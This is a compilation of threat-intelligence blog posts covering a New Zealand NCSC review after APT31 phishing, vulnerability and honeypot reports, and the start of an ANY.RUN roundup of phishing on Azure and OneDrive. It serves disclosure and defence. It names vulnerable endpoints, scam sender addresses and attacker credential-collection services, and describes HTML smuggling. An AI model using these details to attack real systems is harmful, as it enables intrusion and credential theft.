NCSC Implements Key Improvements Following IPAC Review of Cyber Threats

Cyble-Blogs-NCSC

Overview

The New Zealand’s Government Communications Security Bureau (GCSB), through its National Cyber Security Centre (NCSC), has implemented a series of measures to strengthen the country’s defenses against malicious cyber activity.

This follows a thorough review of practices concerning cyberattacks targeting members of the Inter-Parliamentary Alliance on China (IPAC), an organization committed to addressing the growing influence of China’s policies on global security and governance.

The review was initiated in May 2024 by Lisa Fong, the Deputy Director-General of Cyber Security at GCSB. Fong recognized a need for improvement after concerns arose over how the NCSC responded to a cyber incident involving IPAC members. These concerns were particularly focused on the NCSC’s handling of reports related to state-sponsored cyber activities and the broader implications of such incidents on national security.

IPAC members, who represent a coalition of lawmakers across various countries, were targeted in a large-scale cyberattack by APT31, a Chinese state-sponsored hacker group. The attack included over 1,000 emails sent to more than 400 IPAC-associated accounts, compromising the sensitive communications of numerous politicians. Despite the seriousness of the attack, many victims were not informed of the breach by their respective governments, prompting an outcry from international lawmakers.

To address these concerns and strengthen the NCSC’s cybersecurity protocols, a thorough review of the NCSC’s procedures was carried out, culminating in a report published in July 2024. The review focused on the NCSC’s handling of the cyberattack, assessing both the technical response and the broader implications for security and intelligence management.

Key Findings and Recommendations

The review highlighted several areas where the NCSC could improve its procedures. While the NCSC did not identify any successful compromises of classified information, it did detect numerous phishing attempts targeting the parliamentary email addresses of IPAC members. The review’s key recommendations included the following:

  1. Broader Consideration of Implications: The NCSC needed to expand its focus beyond the technical response to cyber incidents. It was recommended that the NCSC develop a more comprehensive approach, one that not only addresses immediate technical threats but also considers the wider geopolitical and societal impacts of cyberattacks.
  2. Enhanced Engagement with Targeted Individuals: The review called for greater engagement with individuals who had been targeted by foreign state-sponsored actors. This recommendation emphasized the need for a more proactive communication strategy to ensure that those affected by cyber threats are informed in a timely manner.
  3. Improved Briefing Procedures: The review also stressed the importance of enhancing the NCSC’s process for briefing the Minister Responsible for the GCSB and their office. Effective communication at all levels of government was seen as crucial for a coordinated and quick response to cyber threats.
  4. Public Guidance for High-Profile Individuals: As part of the review’s fourth recommendation, the NCSC developed and published new guidance on its website for New Zealanders considered “high-profile individuals.” This initiative was designed to offer advice on how to protect against cyberattacks, particularly for those in sensitive roles who might be more likely to become targets.

NCSC’s Response and Implementation

Following the review, the NCSC wasted no time in implementing the recommended changes. Lisa Fong confirmed that all identified improvements had been quickly actioned. “I’m pleased to confirm that we have put in place measures to address all recommendations outlined in the initial review,” said Fong in a statement.

The NCSC took several steps to strengthen its internal processes. These included updating procedures to ensure better alignment with international best practices, particularly in managing incidents involving foreign state-sponsored cyber activity. New internal guidance and standards were also established for NCSC staff to ensure that similar concerns do not arise in the future.

Ms. Fong further explained that while these improvements completed the review’s immediate actions, the NCSC remained committed to continuously enhancing its cybersecurity practices. “We are committed to identifying opportunities for improvement in our practices and procedures and implementing these where we have the ability to do so,” she said.

International Reactions to the Attack

The attack on IPAC members was not an isolated incident but part of a broader pattern of state-sponsored cyber activities targeting global political figures and institutions. Following the attack, several countries with IPAC members took important steps to address the breach and secure their own digital infrastructures.

Canada was one of the countries most affected by the attack, with 18 parliamentarians targeted, including prominent figures such as Garnett Genuis MP and John McKay MP. In response, these members issued a joint statement demanding an explanation as to why they were not notified about the cyberattack sooner. Public debates, including a call for a privileged debate in the House of Commons, highlighted the urgency of addressing these security lapses.

In Belgium, lawmakers, including Representative Els van Hoof and former Prime Minister Guy Verhofstadt, were targeted. These individuals, along with others, rallied political leaders to pursue legal action, pushing for both a parliamentary inquiry and potential criminal proceedings against those responsible.

Meanwhile, in New Zealand, former IPAC co-chairs Simon O’Connor and Louisa Wall, along with other targeted figures such as academic Anne-Marie Brady, pressed the government to ensure that MPs would be informed of similar threats in the future. In response to these concerns, the GCSB initiated a public inquiry, promising to provide further assurances to the affected individuals.

Elsewhere, countries such as France, Germany, and Italy saw similar reactions from their political leaders, who demanded accountability from their respective security agencies and called for international sanctions against APT31. These coordinated international efforts reflect the growing recognition of the threat posed by foreign state-sponsored cyberattacks on democratic institutions.

Broader Cybersecurity Context

The NCSC’s actions come at a time of heightened global concern about the security of democratic institutions and their susceptibility to cyber threats. State-sponsored actors, particularly those associated with China, have increasingly targeted foreign governments, institutions, and political figures to advance geopolitical objectives. The focus on IPAC members is part of a larger trend of foreign interference in democratic processes through digital means, including espionage and disinformation campaigns.

To counter this growing threat, New Zealand’s NCSC has worked closely with international partners such as the National Cyber Security Centre (NCSC) in the United Kingdom and the Government Communications Security Bureau (GCSB) in New Zealand. These agencies have exchanged information and best practices to strengthen cyber defenses against these cyber threats.

Moreover, the NCSC is actively collaborating with the IPAC to enhance global cybersecurity cooperation, ensuring that targeted individuals and organizations receive timely and accurate information about potential threats. This international collaboration is essential to developing a unified, effective approach to defending against state-sponsored cyberattacks.

Conclusion

The review and subsequent improvements undertaken by the NCSC represent a significant step in enhancing New Zealand’s cybersecurity posture, particularly concerning foreign state-sponsored cyber activity. By acting swiftly on the recommendations of the IPAC review, the NCSC has not only addressed specific concerns raised by the targeted individuals but also ensured that its processes and practices are better aligned with international standards for cybersecurity.

As cyber threats continue to evolve, New Zealand’s commitment to continuous improvement and proactive engagement with global partners like the GCSB, NCSC, and IPAC will be an important factor in protecting the nation’s cybersecurity infrastructure and the integrity of its political institutions. As Lisa Fong emphasized, this is not the end of the journey but a part of the ongoing effort to protect New Zealand from emerging cyber risks.

References:

The post NCSC Implements Key Improvements Following IPAC Review of Cyber Threats appeared first on Cyble.

Blog – Cyble – ​Read More

Must-Read Cyble Research Reports of 2024: Trends and Key Takeaways

Cyble-Blogs-Research-Reports

Of the many reports created by Cyble’s talented team of threat researchers this year, seven stand out for their unique and comprehensive insight into the contemporary threat landscape.

We’ll examine some of the key takeaways from the reports, including the changing nature of cyber threats and some surprising solutions readers may not have considered.

Here, then, are insights from seven key Cyble research reports from 2024 that you shouldn’t miss, from broad trends to sector-specific threats that affect us all.

Brand Impersonation and Counterfeit Products

E-Commerce and Brand Monitoring examines the underappreciated risks of counterfeit products and brand impersonation. It includes statistics and case studies that should disturb companies and consumers alike.

Two data points underscore the risks for everyone: 70% of consumers have unknowingly purchased counterfeit products online within the last year, and the average company loses almost $4 billion a year in sales because of counterfeit products.

The report examines the most targeted sectors and methods – and discusses detection technologies, solutions, and actions that can help address the problem.

How Threat Intelligence Became a Core Security Technology

The Year in Cyber Threat Intelligence is a comprehensive look at threat intelligence’s emergence as a central cybersecurity technology, including eight mergers that have remade the sector and revealed its strategic importance even for established security vendors.

The leading threat intelligence platforms have evolved into external attack surface management (EASM) solutions that address risks from the network perimeter to the cloud and beyond. Harnessing AI and vast computing resources, these solutions power a growth rate that’s more than twice as fast as the cybersecurity market as a whole.

Along the way, you’ll get insights into threat intelligence use and features you might not know about, including a few practices that can prevent major cyberattacks before they happen.

Healthcare’s Tough Year

Healthcare cyber incidents in 2024 got bigger and more dramatic than ever before, with crippling ransomware attacks and massive data breaches becoming all too common.

Cyble’s mid-year Healthcare Threat Landscape report looks at incidents from the first half of 2024 – and draws important big-picture inferences and trends from the data. One critical insight: Dark web monitoring is an underappreciated tool for detecting credentials, access, and data leaks before they become much bigger cyberattacks and issues.

The report looks at 10 cases where healthcare access credentials were offered for sale on the dark web. Such breaches can be an important indicator of future attacks for any organization, but they can be particularly dangerous in the healthcare sector. The report also looks at vulnerabilities, data exposures, and ransomware attacks that hit the sector this year.

Medical Device Insecurity

A second healthcare report from Cyble is also worth reading for its insights into the unique systems, devices and challenges that make healthcare security so difficult – and breaches so expensive. In fact, healthcare data breaches are more than 50% more expensive than breaches in any other industry.

Vulnerability Management in Healthcare IoT Devices reveals why healthcare security is so difficult, with a sprawling array of unsupported and insecure devices providing critical patient care – as well as ready access for hackers. Here are some of the disturbing data points from the report:

  • 75% of infusion pumps have unpatched security flaws.
  • 83% of medical imaging systems run on unsupported operating systems.
  • 98% of medical IoT device network traffic is unencrypted.
  • Over 50% of hospital IoT devices are vulnerable to attack.
  • Medical IoT devices were the root cause of 21% of all ransomware attacks in the healthcare sector.
  • Only 52% of companies conduct regular security audits for healthcare IoT devices.

You’ll come away from this report with new insight into healthcare security challenges – along with potential solutions.

Software Supply Chain Risks and Controls

Software supply chain attacks have become a near-daily occurrence, and attacks that come through trusted partners are particularly dangerous because of their privileged access to an organization’s data and environment.

Cyble’s Supply Chain Threats report looked at the many ways that supply chain attacks and vulnerabilities can occur, along with an extensive list of security controls organizations can use to reduce those risks.

The use of open-source components in commercial software adds to those risks, creating an opening for malicious packages and open-source vulnerabilities to enter the commercial supply chain.

As any IT vulnerability from a trusted supplier could be considered a supply chain risk, the section on controls is particularly important. A must for understanding our increasingly interconnected threat landscape.

Financial Cybersecurity

The financial sector was covered in multiple Cyble reports this year, but one stands out above the rest: Cyber Threat Intelligence for Financial Institutions is an exhaustive look at the threats facing financial services companies – along with solutions.

The nearly 5,000-word report enumerates the attack types, vulnerabilities, targets, regions, and threat groups that place the industry at high risk of attack – along with what to expect for threats, controls, and regulatory and compliance pressures in 2025. A must-read for anyone who depends on this vital engine of economic growth.

Transportation Security

The Transportation and Logistics report examines the vast cybersecurity risks that threaten to disrupt transportation and shipping – risks that have grown substantially with automation and AI.

The report looks at the specific vulnerabilities, threat groups, and hacktivists that target the transportation sector, along with the attack types the industry faces.

The report examines eight technologies that can help mitigate those risks. You’ll gain a greater appreciation for the many physical and geopolitical risks that transportation services must negotiate while getting people and goods to their intended destinations.

What’s Next from Cyble Threat Researchers?

In addition to regular reports on sector-specific and general threats, Cyble also publishes comprehensive monthly, semi-annual, and annual reports on the threat landscape that are available for free download. Cyble’s annual threat landscape report will be published in January in the Research Reports section – and will include predictions for 2025.

Cyble’s reports and blogs – along with thousands of daily bulletins sent to threat intelligence subscribers – offer critical, reasoned judgments and insights from seasoned threat researchers into the threats and vulnerabilities meriting priority attention, along with creative solutions to those challenges.

The post Must-Read Cyble Research Reports of 2024: Trends and Key Takeaways appeared first on Cyble.

Blog – Cyble – ​Read More

IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More

Cyble-Blogs-IT-Vulnerability

Overview

Cyble’s December 19 IT vulnerability report to clients highlighted nine vulnerabilities at high risk of attack, including five under active discussion on dark web forums.

Cyble vulnerability intelligence and dark web researchers also noted threat actor claims of zero-day vulnerabilities for sale affecting Palo Alto Networks devices and Chrome and Edge browsers.

In total, Cyble researchers examined 13 vulnerabilities and 8 dark web exploits to arrive at the list of vulnerabilities that security teams should prioritize for patching. At-risk products include Apache Struts, Qualcomm digital signal processors (DSPs), a WordPress plugin, a Bluetooth flaw affecting Ubuntu, and more.

The Week’s Top Vulnerabilities

CVE-2024-53677: This file upload logic vulnerability in the Apache Struts web application framework has been rated 9.5 severity by the Apache Software Foundation but is still undergoing NVD analysis. An attacker could exploit the vulnerability to manipulate file upload parameters to enable path traversal and potentially upload a malicious file that could be used to perform remote code execution. Recently, researchers disclosed that threat actors are attempting to exploit the vulnerability using public proof-of-concept exploits to allow remote code execution, and exploitation has also been discussed on dark web forums. Cyble also published a separate blog on this vulnerability.

Cyble researchers noted that there are nearly 200,000 vulnerable Apache Struts instances exposed to the internet (image below):

CVE-2024-43047: This vulnerability affects Qualcomm’s Digital Signal Processor (DSP) service, which is utilized in many Android devices. It allows for privilege escalation and arbitrary code execution, posing significant risks to affected systems. Google Project Zero marked the vulnerability as actively exploited in October 2024 and received a fix on Android in November 2024. Researchers also observed that the Serbian government exploited Qualcomm zero-days, including CVE-2024-43047, to unlock and infect Android devices with a new spyware family named “NoviSpy.”

CVE-2024-11972: The CVE for this vulnerability has been reserved but has not yet been created. The flaw affects the Hunk Companion WordPress plugin, which is designed to enhance functionality and build visually appealing websites without extensive coding knowledge. The vulnerability allows attackers to perform unauthenticated plugin installation through unauthorized POST requests, enabling them to install and activate other plugins that may contain known vulnerabilities. According to researchers, attackers are exploiting the vulnerability to install outdated plugins with known flaws from the WordPress.org repository. This allows them to access vulnerabilities that can lead to remote code execution (RCE), SQL injection, cross-site scripting (XSS), or the creation of backdoor admin accounts, posing significant risks to site security.

CVE-2023-45866: This medium-severity vulnerability affects Bluetooth HID Hosts in systems utilizing BlueZ, particularly in Ubuntu 22.04 LTS with the BlueZ 5.64-0ubuntu1 package. This vulnerability allows an unauthenticated peripheral HID device to initiate an encrypted connection, potentially enabling the injection of Human Interface Device (HID) messages without user interaction.

Vulnerabilities and Exploits on Underground Forums

Cyble Research and Intelligence Labs (CRIL) researchers also identified the following exploits and vulnerabilities discussed on Telegram channels and cybercrime forums, raising the risk that they will be exploited in attacks.

CVE-2024-28059: This critical security vulnerability, which was identified in the MyQ Print Server in versions prior to 8.2 (patch 43), allows remote attackers to gain elevated privileges on the target server.

CVE-2024-38819: This high-severity path traversal vulnerability in the Spring Framework specifically affects applications that utilize WebMvc.fn or WebFlux.fn functional web frameworks.

CVE-2024-35250: This high-severity privilege escalation vulnerability in the Microsoft Windows operating system specifically affects the kernel-mode driver.

CVE-2024-40711: This critical vulnerability identified in Veeam Backup & Replication software allows for unauthenticated remote code execution (RCE) due to deserialization of untrusted data.

CVE-2023-27997: This heap-based buffer overflow vulnerability in certain FortiOS and FortiProxy versions may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests, specifically affecting SSL VPNs.

Threat actors were also observed offering a zero-day exploit weaponizing a vulnerability claimed to be present on Palo Alto Network’s PAN-OS VPN-supported devices (asking price: $60,000) and a zero-day exploit weaponizing a vulnerability allegedly present in Chrome and Edge (asking price: $100,000).

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:

  • To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
  • Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
  • Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
  • Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
  • Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
  • Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
  • Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching exploitable vulnerabilities in sensitive products and vulnerabilities that could be weaponized as entry points for wider attacks. With increasing discussion of these exploits on dark web forums, organizations must stay vigilant and proactive.

Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive threat intelligence solution like Cyble can monitor for threats and leaks specific to your environment, allowing you to respond quickly to events and prevent them from becoming wider incidents.

The post IT Vulnerability Report: Cyble Urges Fixes for Apache Struts, Qualcomm & More appeared first on Cyble.

Blog – Cyble – ​Read More

Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More

Cyble-Blogs-Ivanti

Overview

Cyble honeypot sensors detected dozens of vulnerabilities under attack in the threat intelligence leader’s most recent sensor intelligence report, including fresh attacks on an Ivanti vulnerability.

Threat actors also targeted vulnerabilities affecting PHP and the Ruby SAML library. Cyble’s Dec. 19 report noted that unpatched networks and IoT devices remain popular targets for hackers looking to breach networks and add to botnets.

The report also looked at Linux and Windows exploits, common brute-force attacks, and phishing campaigns.

Vulnerabilities Under Attack

Cyble detected fresh attacks on CVE-2024-7593, a critical authentication bypass vulnerability in the authentication algorithm implementation of Ivanti’s Virtual Traffic Manager (vTM), excluding versions 22.2R1 and 22.7R2. The 9.8-severity vulnerability can allow a remote, unauthenticated attacker to bypass admin panel authentication. It was added to CISA’s Known Exploited Vulnerabilities catalog in September, one of 11 Ivanti vulnerabilities CISA has added to the KEV catalog this year.

CVE-2024-4577 also remains under attack. The critical PHP vulnerability impacts CGI configurations and remains vulnerable in PHP versions 8.1.* before 8.1.29; 8.2.* before 8.2.20; and 8.3.* before 8.3.8. The 9.8-severity vulnerability enables attackers to execute arbitrary commands through specially crafted URL parameters.

CVE-2024-45409, a vulnerability in the Ruby SAML library designed for implementing the client side of SAML authorization, also remains a frequent target for hackers. In versions 1.12.2 and earlier, and 1.13.0 to 1.16.0, the library fails to verify the signature of SAML Responses properly. The flaw allows an unauthenticated attacker with access to a signed SAML document (issued by the IdP) to forge a SAML Response or Assertion with arbitrary contents, enabling unauthorized login as any user within the affected system. The issue has been resolved in versions 1.17.0 and 1.12.3.

Network and IoT Devices Under Attack

Network and IoT devices remain particularly popular with threat actors, as they can provide entry points into networks as well as additional nodes in a botnet. With many devices with vulnerabilities from 2023 and earlier still unpatched, Cyble noted that the following network vulnerabilities remain particularly popular with attackers:

CVE-2023-20198, a 10.0-severity vulnerability in the web UI feature of the Cisco IOS XE operating system, is being chained with CVE-2023-20273 to gain root privileges in vulnerable devices.

CVE-2023-4966 is a sensitive information disclosure vulnerability in Citrix NetScaler ADC and NetScaler Gateways when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.

CVE-2023-1389 is a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface of TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.

CVE-2023-46747 could allow undisclosed requests in F5 BIG-IP to bypass the configuration utility authentication, allowing an attacker with network access to the system through the management port and/or self-IP addresses to execute arbitrary system commands.

Vulnerabilities in real-time operating systems (RTOS) and embedded devices remain extremely popular with attackers, exposing operational technology (OT) networks with vulnerable devices to attack.

One last vulnerability hackers keep returning to is CVE-2023-47643, an unauthorized GraphQL Introspection vulnerability in the SuiteCRM Customer Relationship Management (CRM) system in versions before 8.4.2. The flaw allows an attacker to access the GraphQL schema without authentication, revealing all object types, arguments, functions, and sensitive fields such as UserHash. By understanding the exposed API attack surface, attackers can exploit this information to access sensitive data.

Linux systems remain continually under attack by CoinMiner, Mirai Botnet, and IRCBot malware, while hundreds of WannaCry ransomware samples continue to be detected each week in Windows 10, Windows Server 2016, and older systems vulnerable to CVE-2017-0147.

Remote Protocols Targeted in Brute-Force Attacks

Remote access protocols, particularly VNC (port 5900), remain popular targets of brute-force attacks. Examining the ports most targeted by the top five attacker countries, attacks originating from the United States targeted ports 5900 (42%), 22 (36%), 3389 (14%), 80 (5%), and 23 (3%). Attacks originating from Russia targeted ports 5900 (81%), 445 (7%), 22 (5%), 23 (3%), and 1433 (3%). Netherlands, Jordan, and China majorly targeted ports 5900, 22, and 445.

Security analysts are advised to add security system blocks for frequently attacked ports (such as 22, 3389, 443, 445, 5900, and 3306).

New Phishing Campaigns Detected

Cyble detected 277 new scam and phishing email addresses in the most recent weekly report. Here are six notable ones, including subject lines:

 E-mail Subject  Scammers Email ID  Scam Type  Description 
Are you interested in investment    Dave@oig.com  Investment Scam  Unrealistic investment offers to steal funds or data 
UN Compensation Fund.   zagranica@usa.com  Claim scam  Fake compensation fund claim 
COMPENSATION FUND OF 5.5 MILLION DOLLARS.        Info@uba.org  Claim scam  Fake compensation fund email 
Funding projects up to USD 5 Billion      noreply@order.eventbrite.com  Investment Scam  Unrealistic investment offers to steal funds or data 
HOTEL AND REAL ESTATE INVESTMENTS     richardowenr928@gmail.com  Investment Scam  Fake hotel and real estate investment scam 
My Donation           test@cinematajrobi.ir  Donation Scam  Fake donation mail to steal money 

Recommendations and Mitigations

Cyble researchers recommend the following security controls:

  • Blocking target hashes, URLs, and email info on security systems (Cyble clients received a separate IoC list).
  • Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.
  • Constantly check for Attackers’ ASNs and IPs.
  • Block Brute Force attack IPs and the targeted ports listed.
  • Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.
  • For servers, set up strong passwords that are difficult to guess.

Conclusion

With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching wherever possible and applying mitigations where patching isn’t possible. The large number of brute-force attacks and phishing campaigns show that attackers remain active even heading into the holiday season.

To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach will be key in protecting defenses against exploitation and data breaches.

The post Cyble Sensors Detect Attacks on Ivanti, PHP, SAML, Network Devices, and More appeared first on Cyble.

Blog – Cyble – ​Read More

Predictive Threat Intelligence – Predictions for 2025: The Future of CTI

Cyble Threat Intelligence

Cybersecurity has long been an essential element of organizational defense, with the growing complexity and frequency of cyberattacks propelling the development of cybersecurity practices. Among these practices, Threat Intelligence (TI) has become a central element, helping organizations anticipate, understand, and counter various cyber threats. As we approach 2025, however, a new evolution in threat intelligence is emerging: Predictive Threat Intelligence (PTI).

While traditional Threat Intelligence (TI) focuses on collecting, analyzing, and sharing data on cyber threats after they occur, Predictive Threat Intelligence goes a step further. It uses advanced techniques, particularly AI (artificial intelligence) and machine learning (ML), to predict cyber threats before they materialize. This field holds great promise for proactively strengthening an organization’s cybersecurity posture by providing early warnings, reducing damage from potential attacks, and enabling defense strategies based on anticipatory insights.

What Is Cyber Threat Intelligence (CTI), and how is it Different from Predictive Threat Intelligence (PTI)?

Cyber Threat Intelligence (CTI) is the practice of collecting, analyzing, and sharing data about cyber threats. By gaining insights into threat actors’ behavior and tactics, techniques, and procedures (TTPs), organizations can better understand potential cyber threats, allowing them to prepare, respond, and mitigate potential attacks.

Traditional Threat Intelligence tends to focus on reactive measures, where security teams analyze attack patterns after a breach or threat occurs. In contrast, Predictive Threat Intelligence (PTI) takes a more proactive stance. By leveraging AI and ML, PTI not only understands current cyber threats but also forecasts future attacks before they materialize.

Machine learning algorithms analyze large datasets, including historical threat data and emerging patterns, to predict the types of threats organizations might face in the near future. For example, if an AI model detects a surge in phishing attacks against a particular industry, it can alert organizations in that sector to prepare for a potential escalation in attacks. This predictive capability allows organizations to take precautionary measures before a threat becomes imminent.

Predictive Threat Intelligence enhances the traditional threat intelligence model by offering actionable, anticipatory insights that enable proactive security measures, such as patching vulnerabilities or reinforcing defenses against specific attack vectors before they are widely exploited. This shift from reactive to proactive cybersecurity is positioned to transform the way organizations approach risk management and threat mitigation.

Why Is Cyber Threat Intelligence (CTI) Important?

Understanding the importance of Cyber Threat Intelligence (CTI) is important to appreciating its role in the cybersecurity ecosystem. As cyberattacks become increasingly damaging, the need for effective threat intelligence grows. Without comprehensive CTI, organizations would be left scrambling to respond to attacks, often too late to prevent significant damage.

CTI provides essential insights into cyber threats, including information about threat actors, their motives, and the vulnerabilities they exploit. With this knowledge, organizations can develop more rugged defense mechanisms and avoid becoming targets for specific types of attacks.

The most compelling reason for investing in CTI is its ability to elevate organizational security beyond reactive measures. By enabling organizations to recognize online threats early, CTI empowers security teams to adopt a proactive security posture. Proactive defense strategies allow vulnerabilities to be patched before they can be exploited and preparations to be made for impending threats, all of which contribute to reducing the overall risk of a breach.

How Does Predictive Threat Intelligence Work?

Predictive Threat Intelligence works by combining AI, machine learning, and advanced analytics to analyze vast amounts of historical and real-time threat data. By understanding the TTPs of cyber adversaries, these tools can identify patterns that signal emerging threats. Here’s how it works in practice:

  1. Data Collection: Predictive threat intelligence platforms collect data from diverse sources, including the surface web, deep web, and dark web, as well as intelligence from private threat-sharing organizations and public cybersecurity resources. These datasets provide crucial insights into potential vulnerabilities and attack vectors.
  2. Data Processing and Analysis: AI models and machine learning algorithms process the collected data, identifying potential threats based on historical attack patterns and emerging trends. For instance, if a surge in phishing attacks targeting a specific industry is detected, AI models can recognize similar characteristics or tactics that might indicate future attacks.
  3. Threat Forecasting: Predictive intelligence platforms then forecast potential threats based on identified trends. For example, AI can predict that a new form of ransomware is gaining traction among cybercriminals, alerting organizations to prepare for a possible attack.
  4. Proactive Response: Once potential threats are identified, the predictive system provides actionable intelligence to help organizations bolster their defenses. These could include patching known vulnerabilities, updating defense strategies, and alerting stakeholders to prepare for specific attack scenarios.

The Role of Artificial Intelligence and Machine Learning in Predictive Threat Intelligence

While Predictive Threat Intelligence (PTI) involves more than just AI, artificial intelligence and machine learning play a crucial role in its development. AI’s strength lies in its ability to analyze massive volumes of data, recognize patterns, and make predictions about future events, including cyberattacks.

However, despite the potential, AI and ML alone are not enough to guarantee a fully predictive threat intelligence model. Predictive intelligence is complex, and building reliable, actionable insights requires a balanced integration of human intelligence and automated systems.

The role of AI and machine learning in predictive intelligence includes:

  • Threat Detection: AI can identify anomalous behavior in network traffic, suggesting potential attack attempts.
  • Risk Analysis: By analyzing attack vectors and patterns, AI models can prioritize potential risks based on the severity of the threats and their likelihood of occurring.
  • Automation: Machine learning models can automate certain security functions, such as scanning for vulnerabilities and patching security gaps, without the need for human intervention.

The Challenge of Implementing Predictive Threat Intelligence

While predictive threat intelligence is a highly promising approach, it faces several challenges, especially in terms of implementation.

  1. Data Availability: One of the primary hurdles is the availability of quality data. AI and machine learning models require large, diverse datasets to learn and predict threats accurately. However, data is often fragmented and may not be available in a standardized format, making it difficult for predictive systems to integrate and analyze it effectively.
  2. Complexity of Predictive Models: Predicting future threats is an inherently complex task. As with any prediction, there is a degree of uncertainty, and not every forecast will be accurate. The dynamic nature of cybersecurity means that there will always be a level of unpredictability when it comes to forecasting attacks.
  3. Human Expertise: Although AI and machine learning are powerful tools, human expertise is still necessary to interpret the data and provide context. Human analysts play a critical role in identifying nuanced threats and validating AI predictions to ensure the intelligence is actionable.
  4. Data Privacy and Sharing: Threat intelligence requires data from multiple sources, including potentially sensitive or confidential data. Therefore, sharing threat intelligence can raise privacy concerns, especially in industries like finance or healthcare. Developing systems that allow for safe and ethical sharing of threat data is essential for the success of PTI.

The Future of Predictive Threat Intelligence in 2025

As we look toward 2025, the role of Predictive Threat Intelligence (PTI) in cybersecurity will become increasingly important. By predicting threats before they materialize, PTI will enable organizations to stay one step ahead of cybercriminals, minimizing the risks of cyber threats.

In the near future, advancements in AI-powered threat intelligence will allow organizations to:

  • Improve the automation of cybersecurity workflows, enabling faster, more accurate threat detection and mitigation.
  • Enhance the integration of AI and human expertise, creating a more effective hybrid threat intelligence model.
  • Develop better predictive models that consider a wider array of threat actors and attack vectors, leading to more accurate forecasts.
  • Better share threat intelligence across industries, increasing collaboration and improving overall cybersecurity resilience.

Cyble, an industry leader in Cyber Threat Intelligence, has been at the forefront of this evolution. Cyble’s Cyber Threat Intelligence Platform provides real-time insights into potential threats, combining historical threat data with AI-driven analysis to deliver actionable, predictive intelligence. By integrating diverse data sources, Cyble enables organizations to identify potential threats, prioritize risks, and take proactive measures to mitigate potential breaches.

Why Choose Cyble?

Cyble offers a comprehensive cyber threat intelligence solution that empowers organizations to tackle cyber threats more effectively. With features like dark web monitoring, vulnerability management, and AI-driven analysis, Cyble helps companies not only detect threats but also predict and prevent them before they cause damage.

Cyble’s platform integrates seamlessly with your existing security infrastructure, enabling you to:

  • Gather intelligence from various sources, including the deep and dark web, to identify emerging threats.
  • Augment data with contextual insights for better decision-making.
  • Receive timely notifications about potential threats and vulnerabilities, enabling proactive defense strategies.

Cyble is ready to help businesses understand and walk through this dynamic landscape and stay protected against cyber threats in 2025 and beyond.

Conclusion: Stay Ahead with Cyble

Predictive Threat Intelligence is the future of threat Intelligence. By leveraging advanced technologies like AI and machine learning, organizations can anticipate threats before they emerge, minimizing the damage caused by cyberattacks. As we move towards 2025, Predictive Threat Intelligence will be an essential tool in every cybersecurity strategy.

If you want to strengthen your organization’s defenses and stay protected from upcoming threats, Cyble’s threat intelligence platform is your go-to solution. Schedule a demo today and discover how Cyble can help you proactively secure your assets against the threats of tomorrow.

The post Predictive Threat Intelligence – Predictions for 2025: The Future of CTI appeared first on Cyble.

Blog – Cyble – ​Read More

5 Major Cyber Attacks in December 2024

The cybersecurity research team of ANY.RUN found and analyzed a bunch of emerging threats with the help of our mighty Interactive Sandbox and Threat Intelligence Lookup.

We’ve been sharing their findings via X and in our blog. Here is a summary on the most interesting insights from December 2024.

Phishing Campaigns targeting Microsoft’s Azure Blob Storage

Original post on X

Phishing page: HTML document with a characteristic attribute

Cyber criminals are abusing Microsoft’s cloud-based file storage solution by hosting phishing pages on the service, employing techniques like HTML smuggling.

The phishing pages are HTML documents that contain a block input element with the ID attribute “doom”. The pages include information about users’ software obtained via JScript (OS and browser), to make them more convincing.

Phishing pages on Azure Blob Storage typically have a short lifespan. Attackers may host pages with redirects to phishing sites. With minimal suspicious content, these pages can evade detection slightly longer.

See the analysis session in the ANY.RUN sandbox.

User’s credentials get stolen from fake sign-in form
  • Threat actors leverage the *.blob.core.windows[.]net subdomain to store documents.
  • Company logos are extracted using email address parsing and loaded from the logo[.]clearbit[.]com service.
  • To collect and store stolen data, an HTTP POST request is sent to nocodeform[.]io for collecting form submissions.
AI-generated summary of the attack in the sandbox

Use the following Threat Intelligence Lookup query to find threats targeting the set of requested domains:

See the Tasks tab in the search results for sandbox sessions with malicious URLs

And this search request to find links to HTML pages hosted on Azure Blob Storage.

Get 20 free requests in TI Lookup
to enrich your threat investigations 



Contact us


Microsoft’s OneDrive also fell victim to HTML Blob Smuggling Campaign

The original post on X

As in the attack above, threat actors make victims believe they are logging into a legitimate platform.

Phishing page disguised as OneDrive login form

Using ANYRUN’s MITM feature, we extracted base.js from the traffic and decoded it. The attack begins with a bait placed on OneDrive. After clicking the link, the user is redirected to the main page containing the HTML Blob Smuggling code. After entering their credentials, victims are redirected to a legitimate website.

Stolen credentials are sent via an HTTP POST request to the C2 server.

Attack details: image sources, stolen data route

